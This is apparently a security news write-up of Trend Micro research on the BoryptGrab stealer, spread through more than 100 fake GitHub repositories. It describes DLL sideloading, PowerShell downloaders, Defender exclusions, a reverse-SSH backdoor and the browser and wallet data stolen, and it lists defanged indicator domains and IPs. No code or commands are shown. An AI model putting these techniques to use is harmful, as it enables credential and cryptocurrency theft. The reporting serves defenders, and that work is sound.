Fake GitHub Repos Push BoryptGrab Stealer To Harvest Browser and Wallet Data

Researchers have discovered a new malware campaign that propagates the stealer BoryptGrab by using phony GitHub repositories This article explores malware campaign propagates. . By pretending to be game cheats, productivity tools, media software, and utility apps, the operation exploits people's trust in GitHub and free software downloads.

When victims look for these tools, they are directed to public repositories that look authentic but use staged download pages and ZIP archives to spread malware. The campaign seems to be active and wide-ranging. More than 100 public GitHub repositories connected to the operation were discovered by investigators, some of which date back to 2025. In order to rank highly in search results, many employed search engine-friendly keywords, which helped the phony projects look similar to authentic software.

Additionally, comments and code patterns in Russian were found on some repository pages, pointing to a potential Russian-speaking threat actor.

Delivery in Multiple Stages Using Fake Tools When a user downloads a ZIP file that looks like a helpful program, the attack starts. Sometimes the executable in the archive launches a hidden payload via DLL sideloading. In others, it has a VBS downloader that retrieves malware from a distant server using obfuscated PowerShell commands.

Additionally, some variations try to lower the likelihood of detection by adding Microsoft Defender exclusions. The malware chain then splits into multiple parts. While some launchers retrieve BoryptGrab, others might retrieve a PyInstaller backdoor called TunnesshClient, a Golang downloader called HeaconLoad, or a Vidar stealer variant.

BoryptGrab campaign attack chain (Source: trendmicro) The attacker can move traffic, execute commands, search files, upload content, and even transform the compromised system into a SOCKS5 proxy by using TunnesshClient to establish a reverse SSH tunnel. The malicious Voicemod Pro Github repository's README page (Source: trendmicro) The campaign is flexible because of its layered design. The use of scheduled tasks, registry persistence, and encrypted downloads complicates investigation, and different victims may receive different payloads.

Web browsers and cryptocurrency wallets are the main targets of theft. The C/C++ stealer BoryptGrab was created to gather a lot of data. Major browsers like Chrome, Edge, Brave, Opera, Firefox, Vivaldi, Chromium, and Yandex are among those it targets. The malware has the ability to retrieve browser data, saved passwords, and other user data.

Additionally, it makes use of publicly accessible code for the Chrome App Bound Encryption bypass, demonstrating how hackers are repurposing open-source projects for nefarious ends. The malware also targets cryptocurrency wallets, including desktop programs and browser extensions, according to Trend Micro research. The ".github" repository contains code for the phony download tool (Source: trendmicro).

Exodus, Electrum, Ledger, Trezor, Atomic, Binance, Wasabi, Bitcoin Core, Ethereum, and numerous other wallets are among those that are targeted. BoryptGrab can also take screenshots, gather data from Telegram and Discord, collect system information, and search shared folders for important files.

Type Indicator Context Domain botshield[. ]vu Malicious payload host Domain best-tinted[. ]com Fake GitHub download page IP Address 193.143.1[.

]104 Attacker server for TunnesshClient IP Address 45.93.20[. ]195 Local SSH forwarding server The malware gathers the stolen data, compresses it, and uploads it to the infrastructure under the attacker's control. The campaign demonstrates how threat actors are combining wallet theft, modular loaders, phony GitHub projects, and SEO abuse into a scalable operation targeted at both common users and cryptocurrency holders.